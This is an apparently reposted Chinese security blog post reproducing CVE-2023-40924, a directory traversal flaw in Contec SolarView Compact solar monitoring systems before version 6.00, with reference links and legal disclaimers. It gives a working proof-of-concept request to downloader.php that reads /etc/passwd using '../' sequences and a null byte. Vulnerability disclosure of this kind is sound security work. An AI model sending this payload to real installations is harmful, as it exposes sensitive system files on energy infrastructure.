本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
Contec(康泰克)是一家专注于定制化嵌入式计算、工业自动化和IoT通信技术的公司。Contec SolarView Compact是Contec公司的一个应用系统,系统可用于远程性能监测、故障排除、系统优化和其他功能,以便对可再生能源生产单位进行远程管理。
开发语言:PHP
漏洞描述
攻击者通过downloader.php利用该漏洞进行攻击?file参数通过目录传递读取敏感文件。
影响版本
SolarView Compact < 6.00
空间测绘
回复“CVE-2023-40924”获取空间测绘语句
漏洞利用
POC
/downloader.php?file=../../../../../../../../etc/passwd%00.jpg
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-40924https://github.com/Yobing1/CVE-2023-40924/blob/main/README.md
回复“CVE-2023-40924”获取空间测绘语句
原文始发于微信公众号(不够安全):CVE-2023-40924:SolarView Compact光伏发电测量系统 目录遍历漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论